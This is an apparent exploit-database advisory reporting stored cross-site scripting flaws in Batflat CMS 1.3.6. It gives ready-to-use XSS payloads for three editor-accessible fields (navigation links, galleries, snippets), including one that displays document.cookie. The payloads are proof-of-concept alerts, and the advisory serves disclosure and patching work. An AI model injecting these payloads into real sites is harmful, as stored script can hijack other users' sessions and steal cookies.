Batflat CMS version 1.3.6 suffers from multiple persistent cross site scripting vulnerabilities.
d607d6b6b12d1abb1b361fd3bd0fbdfd9cf588f5663e8b1bee73a35f5ad78e5c
# Exploit Title: Batflat CMS 1.3.6 - 'multiple' Stored XSS
# Date: 22/02/2021
# Exploit Author: Tadjmen
# Vendor Homepage: https://batflat.org/
# Software Link: https://github.com/sruupl/batflat/archive/master.zip
# Version: 1.3.6
# Tested on: Xammpp on Windows, Firefox Newest
# CVE : N/A
Multiple Stored XSS Cross-Site Scripting on Batflat CMS 1.3.6
Login with editor account with rights to Navigation, Galleries, Snippets
Navigation
- Add link
payload: "><img src=x onerror=alert(document.cookie)>
Galleries
- Add gallery
payload: mlem"><svg/onload=alert(1)>
Snippets
- Add Snippets
payload: mlem"><svg/onload=alert("TuongNC")>
More information:
https://github.com/sruupl/batflat/issues/105